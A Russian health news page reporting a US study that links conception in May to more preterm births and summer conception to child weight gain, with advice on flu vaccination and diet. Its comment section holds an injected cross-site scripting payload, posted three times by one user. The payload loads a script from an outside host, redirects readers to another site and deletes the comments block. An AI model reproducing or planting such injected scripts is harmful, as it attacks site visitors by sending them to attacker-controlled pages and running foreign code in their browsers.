Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ученые выяснили, какой ме...  >>  Ученые выяснили, какой месяц худший для зачатия
 
Обратная связь
 

Ученые выяснили, какой месяц худший для зачатия

Размер шрифта
27 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Есть ли связь между месяцем зачатия ребенка и его здоровьем в дальнейшей жизни? Казалось бы, нет. Но ученые из США совершили ошеломляющее открытие! Оказывается, связь есть! Когда же рожать, чтобы ребенок был здоров?

Ученные выяснили какой месяц худший для зачатия

Ученые выяснили, что зачатие, совершившееся в мае, чаще заканчивается преждевременными родами по сравнению с другими месяцами. Специалисты связывают это с сезонной эпидемией гриппа, которая отмечается в январе и феврале, как раз накануне намечающихся родов.

«Мы были поражены, насколько явный характер носит эта закономерность. Вероятность преждевременных родов повышается на целых 10%!» – отмечает Джанет Карри, глава исследования (Принстонский университет, США). «Совсем недавно были опубликованы работы, в которых описывалось влияние вируса гриппа на беременность, и наше исследование полностью соответствует этому».

В исследовании приняли участие почти 700 000 матерей из северо-восточных регионов США. Помимо календарных данных, ученые также принимали во внимание вес матерей и его динамику, расовые особенности, уровень образования и вредные привычки.

Май оказался не единственным «провинившимся» месяцем. Ученые выяснили, что дети, зачатые летом, более склонны к набору веса, чем остальные.

«По-видимому, это связано с тем, что летом будущие мамы сами охотнее набирают вес», – говорит Карри. «Связано ли это с особенностями рациона или с чем-то еще – пока неясно».

Ученые отмечают, что нет смысла воевать с календарем, избегая зачатия в какой-либо конкретный промежуток времени. Вместо этого лучше регулярно вакцинироваться от гриппа и правильно питаться. Это позволить превентивно побороть возможные неприятные последствия.

Стоит отметить, что вакцина не противопоказана беременным.

«Она абсолютно безопасна как для матери, так и для плода», – заверяют американские инфекционисты. «Сегодня мы совершенно точно знаем, что грипп может нанести колоссальный ущерб здоровью беременной женщины и ее будущему ребенку, поэтому специфическая профилактика однозначно необходима. Еще один аргумент в пользу вакцины – снижение риска недоношенной беременности».

Абсолютно согласны с коллегами и акушеры.

«Соблюдение этих простых рекомендаций намного эффективнее, чем поиск «правильного» срока для зачатия», – говорит доктор Ричард Джонс, глава отделения акушерства и гинекологии одной из техасских клиник. «В половине случаев зачатие вообще происходит незапланированно».

Поэтому не забивайте себе голову: следите за своим здоровьем, правильно питайтесь, каждый год прививайтесь от гриппа – и можете смело «делать детей» даже в мае.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
То, что ест отец до зачатия, влияет на здоровье ребенка   Мир гармонии, здоровья и долголетия   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.